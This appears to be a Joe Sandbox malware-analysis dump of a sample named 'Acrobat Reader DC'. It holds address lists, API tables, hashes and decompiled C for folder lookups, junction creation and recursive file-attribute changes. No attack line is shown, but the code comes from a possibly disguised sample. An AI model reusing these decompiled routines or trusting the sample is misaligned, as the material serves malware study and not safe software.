                                  0x004724fe
                                  0x00472500
                                  0x00472502
                                  0x00472504
                                  0x00472506
                                  0x00000000
                                  0x00000000
                                  0x00472511
                                  0x00472511
                                  0x00472517
                                  0x00472518
                                  0x0047251a
                                  0x0047251c
                                  0x0047251e
                                  0x00472520
                                  0x00000000
                                  0x00000000
                                  0x0047252b
                                  0x0047252b
                                  0x00472531
                                  0x00472532
                                  0x00472534
                                  0x00472536
                                  0x00472538
                                  0x0047253a
                                  0x00000000
                                  0x00000000
                                  0x00472545
                                  0x00472545
                                  0x0047254b
                                  0x0047254c
                                  0x0047254e
                                  0x00472550
                                  0x00472552
                                  0x00472554
                                  0x00000000
                                  0x00000000
                                  0x0047255f
                                  0x0047255f
                                  0x00472565
                                  0x00472566
                                  0x00472568
                                  0x0047256a
                                  0x0047256c
                                  0x0047256e
                                  0x00000000
                                  0x00000000
                                  0x00472579
                                  0x00472579
                                  0x0047257f
                                  0x00472580
                                  0x00472582
                                  0x00472584
                                  0x00472586
                                  0x00472588
                                  0x00000000
                                  0x00000000
                                  0x00472593
                                  0x00472593
                                  0x00472599
                                  0x0047259a
                                  0x0047259c
                                  0x0047259e
                                  0x004725a0
                                  0x004725a2
                                  0x00000000
                                  0x00000000
                                  0x004725ad
                                  0x004725ad
                                  0x004725b3
                                  0x004725b4
                                  0x004725b6
                                  0x004725b8
                                  0x004725ba
                                  0x004725bc
                                  0x00000000
                                  0x00000000
                                  0x004725c7
                                  0x004725cd
                                  0x004725ce
                                  0x004725d0
                                  0x004725d2
                                  0x004725d4
                                  0x004725d6
                                  0x00000000
                                  0x00000000
                                  0x004725e1
                                  0x004725e7
                                  0x004725e8
                                  0x004725ea
                                  0x004725ec
                                  0x004725ee
                                  0x004725f0
                                  0x00000000
                                  0x00000000
                                  0x004725fb
                                  0x00472601
                                  0x00472602
                                  0x00472604
                                  0x00472606
                                  0x00472608
                                  0x0047260a
                                  0x00000000
                                  0x00000000
                                  0x00472615
                                  0x0047261b
                                  0x0047261c
                                  0x0047261e
                                  0x00472620
                                  0x00472622
                                  0x00472624
                                  0x00000000
                                  0x00000000
                                  0x0047262f
                                  0x00472635
                                  0x00472636
                                  0x00472638
                                  0x0047263a
                                  0x0047263c
                                  0x0047263e
                                  0x00000000
                                  0x00000000
                                  0x00472649
                                  0x0047264f
                                  0x00472650
                                  0x00472652
                                  0x00472654
                                  0x00472656
                                  0x00472658
                                  0x00000000
                                  0x00000000
                                  0x00472663
                                  0x00472669
                                  0x0047266a
                                  0x0047266c
                                  0x0047266e
                                  0x00472670
                                  0x00472672
                                  0x00000000
                                  0x00000000
                                  0x0047267d
                                  0x00472681
                                  0x00472688
                                  0x0047268f
                                  0x00000000
                                  0x00000000
                                  0x0047269f
                                  0x004726a6
                                  0x004726ac
                                  0x004726ae
                                  0x00000000
                                  0x004726b4
                                  0x00000000
                                  0x004726b4
                                  0x00000000
                                  0x00000000
                                  0x004726b9
                                  0x004726bf
                                  0x004726c3
                                  0x004726c8
                                  0x004726ce
                                  0x004726cf
                                  0x004726f2
                                  0x004726d1
                                  0x004726d1
                                  0x004726d3
                                  0x004726d6
                                  0x004726d9
                                  0x004726e2
                                  0x004726e4
                                  0x004726e8
                                  0x004726e8
                                  0x00000000
                                  0x00000000
                                  0x00472da0
                                  0x00472da0
                                  0x00000000
                                  0x00000000
                                  0x004726fd
                                  0x004726ff
                                  0x00472704
                                  0x00000000
                                  0x00000000
                                  0x0047270f
                                  0x00472711
                                  0x00472716
                                  0x00000000
                                  0x00000000
                                  0x00472721
                                  0x00472723
                                  0x00472728
                                  0x00000000
                                  0x00000000
                                  0x00472733
                                  0x00472735
                                  0x0047273a
                                  0x00000000
                                  0x00000000
                                  0x00472745
                                  0x00472747
                                  0x0047274c
                                  0x00000000
                                  0x00000000
                                  0x004727c7
                                  0x004727c9
                                  0x004727ce
                                  0x00000000
                                  0x00000000
                                  0x004727d9
                                  0x004727db
                                  0x004727e0
                                  0x00000000
                                  0x00000000
                                  0x00472757
                                  0x00472759
                                  0x0047275e
                                  0x00000000
                                  0x00000000
                                  0x00472769
                                  0x0047276b
                                  0x00472770
                                  0x00000000
                                  0x00000000
                                  0x0047277b
                                  0x0047277d
                                  0x00472782
                                  0x00000000
                                  0x00000000
                                  0x0047278d
                                  0x0047278f
                                  0x00472794
                                  0x00000000
                                  0x00000000
                                  0x00472c6f
                                  0x00472c6f
                                  0x00472c71
                                  0x00472c76
                                  0x00000000
                                  0x00000000
                                  0x004727eb
                                  0x004727ed
                                  0x004727f2
                                  0x00000000
                                  0x00000000
                                  0x004727fd
                                  0x004727ff
                                  0x00472804
                                  0x00000000
                                  0x00000000
                                  0x0047279f
                                  0x00000000
                                  0x00000000
                                  0x004727be
                                  0x004727a6
                                  0x004727a6
                                  0x004727a8
                                  0x00472da2
                                  0x00472da2
                                  0x00472da7
                                  0x004727ae
                                  0x004727ae
                                  0x004727b3
                                  0x004727b3
                                  0x00000000
                                  0x00000000
                                  0x0047280f
                                  0x00000000
                                  0x00000000
                                  0x0047281a
                                  0x00000000
                                  0x00000000
                                  0x00472825
                                  0x00000000
                                  0x00000000
                                  0x00472830
                                  0x00472837
                                  0x0047283c
                                  0x0047283e
                                  0x00472840
                                  0x00472845
                                  0x00000000
                                  0x00000000
                                  0x0047284c
                                  0x00472858
                                  0x00000000
                                  0x00000000
                                  0x004728cf
                                  0x00000000
                                  0x00000000
                                  0x004728d9
                                  0x004728de
                                  0x004728e2
                                  0x004728ee
                                  0x004728f2
                                  0x004728fe
                                  0x00472902
                                  0x0047290e
                                  0x00472912
                                  0x0047291e
                                  0x00472922
                                  0x0047292e
                                  0x00472932
                                  0x0047293e
                                  0x00472942
                                  0x0047295d
                                  0x00472961
                                  0x00000000
                                  0x00472963
                                  0x00472963
                                  0x00472963
                                  0x00472944
                                  0x00472944
                                  0x00472948
                                  0x0047294d
                                  0x00472953
                                  0x00472953
                                  0x0047294d
                                  0x00472934
                                  0x00472934
                                  0x00472934
                                  0x00472924
                                  0x00472924
                                  0x00472924
                                  0x00472914
                                  0x00472914
                                  0x00472914
                                  0x00472904
                                  0x00472904
                                  0x00472904
                                  0x004728f4
                                  0x004728f4
                                  0x004728f4
                                  0x004728e4
                                  0x004728e4
                                  0x004728e4
                                  0x00000000
                                  0x00000000
                                  0x00472977
                                  0x0047297c
                                  0x0047297f
                                  0x00472981
                                  0x00472986
                                  0x00000000
                                  0x00000000
                                  0x0047298d
                                  0x00472993
                                  0x00472996
                                  0x00472998
                                  0x0047299d
                                  0x004729a5
                                  0x004729a5
                                  0x004729ad
                                  0x00000000
                                  0x00000000
                                  0x004729bf
                                  0x004729c5
                                  0x004729ca
                                  0x004722be
                                  0x004722be
                                  0x00000000
                                  0x00000000
                                  0x00472863
                                  0x00472869
                                  0x0047286d
                                  0x0047286f
                                  0x00472893
                                  0x00472871
                                  0x00472871
                                  0x00472874
                                  0x00472889
                                  0x00472876
                                  0x00472876
                                  0x00472879
                                  0x0047296d
                                  0x0047296d
                                  0x0047287f
                                  0x0047287f
                                  0x0047287f
                                  0x00472879
                                  0x00472874
                                  0x00000000
                                  0x00000000
                                  0x0047289d
                                  0x0047289f
                                  0x004728a4
                                  0x004728a6
                                  0x004728a9
                                  0x004728ab
                                  0x004728ae
                                  0x004728b1
                                  0x004728b4
                                  0x004728bb
                                  0x004728c0
                                  0x004728c2
                                  0x004728c2
                                  0x004728c7
                                  0x00000000
                                  0x00000000
                                  0x00472a13
                                  0x00472a1a
                                  0x00472a20
                                  0x00000000
                                  0x00000000
                                  0x00472a37
                                  0x00472a3c
                                  0x00472a43
                                  0x00472a45
                                  0x00472a47
                                  0x00472a4f
                                  0x00472a51
                                  0x00472a5b
                                  0x00472a5b
                                  0x00472a63
                                  0x00472a66
                                  0x00472a68
                                  0x00472a6b
                                  0x00472a7c
                                  0x00472a6d
                                  0x00472a6d
                                  0x00472a72
                                  0x00472a72
                                  0x00472a84
                                  0x00472a84
                                  0x00472a84
                                  0x00472a85
                                  0x00472a8c
                                  0x00472a8d
                                  0x00472a95
                                  0x00472a95
                                  0x00472a5b
                                  0x00472a99
                                  0x00472a9b
                                  0x00472aa3
                                  0x00000000
                                  0x00000000
                                  0x00472ab3
                                  0x00472abc
                                  0x00000000
                                  0x00000000
                                  0x00472acd
                                  0x00472ad5
                                  0x00000000
                                  0x00000000
                                  0x00472add
                                  0x00472ae3
                                  0x00472aeb
                                  0x00000000
                                  0x00000000
                                  0x00472af3
                                  0x00472af9
                                  0x00472b01
                                  0x00000000
                                  0x00000000
                                  0x00472b0f
                                  0x00472b17
                                  0x00000000
                                  0x00000000
                                  0x004721e6
                                  0x004721ee
                                  0x004721f3
                                  0x004721fb
                                  0x00000000
                                  0x00000000
                                  0x00472203
                                  0x00472208
                                  0x00472210
                                  0x00472210
                                  0x00472218
                                  0x00000000
                                  0x00000000
                                  0x00472220
                                  0x00472225
                                  0x0047222d
                                  0x0047222d
                                  0x00472235
                                  0x00000000
                                  0x00000000
                                  0x00472b1f
                                  0x00472b2a
                                  0x00472b30
                                  0x00472b33
                                  0x00472b35
                                  0x00472b3a
                                  0x00000000
                                  0x00000000
                                  0x00472b41
                                  0x00472b4c
                                  0x00472b52
                                  0x00472b55
                                  0x00472b57
                                  0x00472b5c
                                  0x00000000
                                  0x00000000
                                  0x00472b69
                                  0x00472b6c
                                  0x00472b75
                                  0x00472b78
                                  0x00472b7e
                                  0x00472b80
                                  0x00472b83
                                  0x00472b88
                                  0x00472b8b
                                  0x00472b90
                                  0x00472b97
                                  0x00472b99
                                  0x00472b9f
                                  0x00472ba7
                                  0x00472ba7
                                  0x00472baf
                                  0x00000000
                                  0x00000000
                                  0x00472bb8
                                  0x00472bbb
                                  0x00472bc4
                                  0x00472bc7
                                  0x00472bcd
                                  0x00472bcf
                                  0x00472bd7
                                  0x00472bda
                                  0x00472bdf
                                  0x00472be6
                                  0x00472be8
                                  0x00472bee
                                  0x00472bf6
                                  0x00472bf6
                                  0x00472bfe
                                  0x00000000
                                  0x00000000
                                  0x00472c5c
                                  0x00472c61
                                  0x00472c64
                                  0x00000000
                                  0x00472c66
                                  0x00472c66
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00472c06
                                  0x00472c12
                                  0x00000000
                                  0x00000000
                                  0x0047223d
                                  0x00472242
                                  0x0047224a
                                  0x0047224a
                                  0x00472252
                                  0x00000000
                                  0x00000000
                                  0x00472c3f
                                  0x00472c43
                                  0x00472c4a
                                  0x00472c51
                                  0x00000000
                                  0x00000000
                                  0x00472c1d
                                  0x00472c29
                                  0x00472c2f
                                  0x00472c35
                                  0x00000000
                                  0x00000000
                                  0x00472c86
                                  0x00472c92
                                  0x00000000
                                  0x00000000
                                  0x00472cae
                                  0x00000000
                                  0x00000000
                                  0x00472cbe
                                  0x00472cca
                                  0x00000000
                                  0x00000000
                                  0x00472cda
                                  0x00472ce6
                                  0x00000000
                                  0x00000000
                                  0x00472d02
                                  0x00000000
                                  0x00000000
                                  0x00472d12
                                  0x00472d1e
                                  0x00000000
                                  0x00000000
                                  0x00472d2e
                                  0x00472d3a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472d45
                                  0x00472d4b
                                  0x00472d4d
                                  0x00472d52
                                  0x00472dad
                                  0x00472dad
                                  0x00000000
                                  0x00000000
                                  0x00472d56
                                  0x00000000
                                  0x00000000
                                  0x00472d61
                                  0x00472d67
                                  0x00472d6a
                                  0x00472d6d
                                  0x00472d6f
                                  0x00472d71
                                  0x00472d71
                                  0x00472d77
                                  0x00472d79
                                  0x00472d7c
                                  0x00472d81
                                  0x00472d84
                                  0x00472d87
                                  0x00472d89
                                  0x00472d95
                                  0x00472d95
                                  0x00472d9d
                                  0x00000000
                                  0x00000000
                                  0x004729e3
                                  0x004729e9
                                  0x004729ee
                                  0x004729f3
                                  0x00472a03
                                  0x00472a06
                                  0x004722c1
                                  0x004722c1
                                  0x004722c1
                                  0x004722c7
                                  0x004722c7
                                  0x004722cc
                                  0x004722cc
                                  0x004722d4
                                  0x004722d4
                                  0x004722dc
                                  0x00000000
                                  0x00000000
                                  0x004721da
                                  0x0047215e
                                  0x00472163
                                  0x00472166
                                  0x00472171
                                  0x00472178
                                  0x00472187
                                  0x0047218c
                                  0x00472191
                                  0x004721b1
                                  0x004721b9
                                  0x004721c1
                                  0x004721c6
                                  0x004721ce
                                  0x00472193
                                  0x00472195
                                  0x0047219d
                                  0x004721ad
                                  0x004721ad
                                  0x00472191
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 00472103
                                  • _memset.LIBCMT ref: 00472121
                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                  • __swprintf.LIBCMT ref: 004722B9
                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FolderPath$_memset$LocalTime__swprintf
                                  • String ID: %.3d
                                  • API String ID: 645292623-986655627
                                  • Opcode ID: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                  • Opcode Fuzzy Hash: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431BE8 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 116COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00431BE8(long _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v524;
				char _v2068;
				short _v2072;
				short _v2074;
				signed short _v2080;
				void _v2084;
				short _v2604;
				long _t31;
				int _t35;
				signed short _t44;
				int _t46;
				WCHAR* _t52;
				signed int _t69;
				void* _t74;
				void* _t77;

				_t62 = _a4;
				_t52 = _a8;
				_t31 = GetFullPathNameW(_a4, 0x104,  &_v2604,  &_a8);
				if(_t31 != 0) {
					E0041329B(_t62,  &_v524, L"\\??\\%s",  &_v2604);
					_t69 = E004111C1( &_v524);
					if( *((short*)(_t77 + _t69 * 2 - 0x20a)) == 0x5c &&  *((short*)(_t77 + _t69 * 2 - 0x20c)) != 0x3a) {
						 *((short*)(_t77 + _t69 * 2 - 0x20a)) = 0;
					}
					_t35 = CreateDirectoryW(_t52, 0);
					if(_t35 != 0 || _a12 != _t35) {
						_t74 = CreateFileW(_t52, 0x40000000, 0, 0, 3, 0x2200000, 0);
						if(_t74 == 0xffffffff) {
							L11:
							RemoveDirectoryW(_t52);
							return 0;
						} else {
							E00412F40( &_v2084, 0, 0x14);
							_v2074 = _t69 + _t69;
							_v2084 = 0xa0000003;
							_v2072 = _v2074 + 2;
							E00412FBA( &_v2068,  &_v524, 0x104);
							_t44 = _v2074 + 0xc;
							_v2080 = _t44;
							_t46 = DeviceIoControl(_t74, 0x900a4,  &_v2084, (_t44 & 0x0000ffff) + 8, 0, 0,  &_a4, 0);
							_push(_t74);
							if(_t46 != 0) {
								CloseHandle();
								return 1;
							} else {
								CloseHandle();
								goto L11;
							}
						}
					} else {
						return _t35;
					}
				} else {
					return _t31;
				}
			}


















                                  0x00431beb
                                  0x00431bf5
                                  0x00431c09
                                  0x00431c11
                                  0x00431c2e
                                  0x00431c3f
                                  0x00431c4d
                                  0x00431c5c
                                  0x00431c5c
                                  0x00431c67
                                  0x00431c6f
                                  0x00431c98
                                  0x00431c9d
                                  0x00431d31
                                  0x00431d32
                                  0x00431d40
                                  0x00431ca3
                                  0x00431cae
                                  0x00431cb6
                                  0x00431cd9
                                  0x00431ce3
                                  0x00431cea
                                  0x00431cfa
                                  0x00431d0c
                                  0x00431d20
                                  0x00431d26
                                  0x00431d29
                                  0x00431d43
                                  0x00431d54
                                  0x00431d2b
                                  0x00431d2b
                                  0x00000000
                                  0x00431d2b
                                  0x00431d29
                                  0x00431c76
                                  0x00431c7b
                                  0x00431c7b
                                  0x00431c13
                                  0x00431c17
                                  0x00431c17

                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                  • __swprintf.LIBCMT ref: 00431C2E
                                  • _wcslen.LIBCMT ref: 00431C3A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2192556992-3457252023
                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00431A86(intOrPtr __ecx, WCHAR* _a4, signed int _a8, signed int _a12, char _a16) {
				struct _WIN32_FIND_DATAW _v596;
				intOrPtr _v600;
				void* _t33;
				void* _t34;
				void* _t43;
				void* _t46;
				void* _t55;
				void* _t77;
				void* _t83;
				signed int _t89;
				void* _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x254;
				_v600 = __ecx;
				_t55 = 0;
				_t83 = FindFirstFileW(_a4,  &_v596);
				if(_t83 == 0xffffffff) {
					L7:
					FindClose(_t83);
					if(_a16 != 0) {
						_t77 = FindFirstFileW("*.*",  &_v596);
						if(_t77 == 0xffffffff) {
							L18:
							FindClose(_t77);
							return 1;
						} else {
							do {
								if((_v596.dwFileAttributes & 0x00000010) == 0) {
									goto L17;
								} else {
									_t33 = E0041313C( &(_v596.cFileName), ".");
									_t91 = _t91 + 8;
									if(_t33 == 0) {
										goto L17;
									} else {
										_t34 = E0041313C( &(_v596.cFileName), 0x48ab30);
										_t91 = _t91 + 8;
										if(_t34 == 0) {
											goto L17;
										} else {
											SetCurrentDirectoryW( &(_v596.cFileName));
											if(E00431A86(_v600, _a4, _a8, _a12, _a16) == 0) {
												FindClose(_t77);
												return 0;
											} else {
												SetCurrentDirectoryW(0x48ab30);
												goto L17;
											}
										}
									}
								}
								goto L20;
								L17:
							} while (FindNextFileW(_t77,  &_v596) != 0);
							goto L18;
						}
					} else {
						return _t55;
					}
				} else {
					do {
						_t43 = E0041313C( &(_v596.cFileName), ".");
						_t91 = _t91 + 8;
						if(_t43 == 0) {
							goto L6;
						} else {
							_t46 = E0041313C( &(_v596.cFileName), 0x48ab30);
							_t91 = _t91 + 8;
							if(_t46 == 0) {
								goto L6;
							} else {
								if(SetFileAttributesW( &(_v596.cFileName), (GetFileAttributesW( &(_v596.cFileName)) | _a8) &  !_a12) == 0) {
									FindClose(_t83);
									return 0;
								} else {
									_t55 = 1;
									goto L6;
								}
							}
						}
						goto L20;
						L6:
					} while (FindNextFileW(_t83,  &_v596) != 0);
					goto L7;
				}
				L20:
			}














                                  0x00431a8c
                                  0x00431a9f
                                  0x00431aa8
                                  0x00431aac
                                  0x00431ab1
                                  0x00431b19
                                  0x00431b20
                                  0x00431b26
                                  0x00431b51
                                  0x00431b56
                                  0x00431bcc
                                  0x00431bcd
                                  0x00431bd7
                                  0x00431b58
                                  0x00431b5e
                                  0x00431b63
                                  0x00000000
                                  0x00431b65
                                  0x00431b6f
                                  0x00431b74
                                  0x00431b79
                                  0x00000000
                                  0x00431b7b
                                  0x00431b85
                                  0x00431b8a
                                  0x00431b8f
                                  0x00000000
                                  0x00431b91
                                  0x00431b96
                                  0x00431bb3
                                  0x00431bdb
                                  0x00431be5
                                  0x00431bb5
                                  0x00431bba
                                  0x00000000
                                  0x00431bba
                                  0x00431bb3
                                  0x00431b8f
                                  0x00431b79
                                  0x00000000
                                  0x00431bbc
                                  0x00431bc8
                                  0x00000000
                                  0x00431b5e
                                  0x00431b28
                                  0x00431b30
                                  0x00431b30
                                  0x00431ab6
                                  0x00431ab6
                                  0x00431ac0
                                  0x00431ac5
                                  0x00431aca
                                  0x00000000
                                  0x00431acc
                                  0x00431ad6
                                  0x00431adb
                                  0x00431ae0
                                  0x00000000
                                  0x00431ae2
                                  0x00431b05
                                  0x00431b34
                                  0x00431b42
                                  0x00431b07
                                  0x00431b07
                                  0x00000000
                                  0x00431b07
                                  0x00431b05
                                  0x00431ae0
                                  0x00000000
                                  0x00431b09
                                  0x00431b15
                                  0x00000000
                                  0x00431ab6
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00442886(intOrPtr __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				intOrPtr _v8;
				struct _WIN32_FIND_DATAW _v604;
				void* _t32;
				void* _t33;
				void* _t42;
				void* _t45;
				void* _t47;
				void* _t50;
				void* _t66;
				void* _t67;
				void* _t69;

				_v8 = __ecx;
				_t50 = 0;
				_t67 = FindFirstFileW(_a4,  &_v604);
				if(_t67 == 0xffffffff) {
					L7:
					FindClose(_t67);
					if(_a16 != 0) {
						_t66 = FindFirstFileW("*.*",  &_v604);
						if(_t66 == 0xffffffff) {
							L18:
							FindClose(_t66);
							return 1;
						} else {
							do {
								if((_v604.dwFileAttributes & 0x00000010) == 0) {
									goto L17;
								} else {
									_t32 = E0041313C( &(_v604.cFileName), ".");
									_t69 = _t69 + 8;
									if(_t32 == 0) {
										goto L17;
									} else {
										_t33 = E0041313C( &(_v604.cFileName), 0x48ab30);
										_t69 = _t69 + 8;
										if(_t33 == 0) {
											goto L17;
										} else {
											SetCurrentDirectoryW( &(_v604.cFileName));
											if(E00442886(_v8, _a4, _a8, _a12, _a16) == 0) {
												FindClose(_t66);
												return 0;
											} else {
												SetCurrentDirectoryW(0x48ab30);
												goto L17;
											}
										}
									}
								}
								goto L20;
								L17:
							} while (FindNextFileW(_t66,  &_v604) != 0);
							goto L18;
						}
					} else {
						return _t50;
					}
				} else {
					do {
						_t42 = E0041313C( &(_v604.cFileName), ".");
						_t69 = _t69 + 8;
						if(_t42 == 0) {
							goto L6;
						} else {
							_t45 = E0041313C( &(_v604.cFileName), 0x48ab30);
							_t69 = _t69 + 8;
							if(_t45 == 0) {
								goto L6;
							} else {
								_t47 = E00433C08( &(_v604.cFileName), _a8, _a12);
								_t69 = _t69 + 0xc;
								if(_t47 == 0) {
									FindClose(_t67);
									return 0;
								} else {
									_t50 = 1;
									goto L6;
								}
							}
						}
						goto L20;
						L6:
					} while (FindNextFileW(_t67,  &_v604) != 0);
					goto L7;
				}
				L20:
			}














                                  0x0044289e
                                  0x004428a6
                                  0x004428aa
                                  0x004428af
                                  0x00442915
                                  0x0044291c
                                  0x00442922
                                  0x0044294f
                                  0x00442954
                                  0x004429d3
                                  0x004429d4
                                  0x004429de
                                  0x00442956
                                  0x0044295c
                                  0x00442963
                                  0x00000000
                                  0x00442965
                                  0x00442971
                                  0x00442976
                                  0x0044297b
                                  0x00000000
                                  0x0044297d
                                  0x00442989
                                  0x0044298e
                                  0x00442993
                                  0x00000000
                                  0x00442995
                                  0x0044299c
                                  0x004429b8
                                  0x004429e2
                                  0x004429ec
                                  0x004429ba
                                  0x004429bf
                                  0x00000000
                                  0x004429bf
                                  0x004429b8
                                  0x00442993
                                  0x0044297b
                                  0x00000000
                                  0x004429c1
                                  0x004429cf
                                  0x00000000
                                  0x0044295c
                                  0x00442924
                                  0x0044292c
                                  0x0044292c
                                  0x004428b1
                                  0x004428b6
                                  0x004428c2
                                  0x004428c7
                                  0x004428cc
                                  0x00000000
                                  0x004428ce
                                  0x004428da
                                  0x004428df
                                  0x004428e4
                                  0x00000000
                                  0x004428e6
                                  0x004428f5
                                  0x004428fa
                                  0x004428ff
                                  0x00442930
                                  0x0044293e
                                  0x00442901
                                  0x00442901
                                  0x00000000
                                  0x00442901
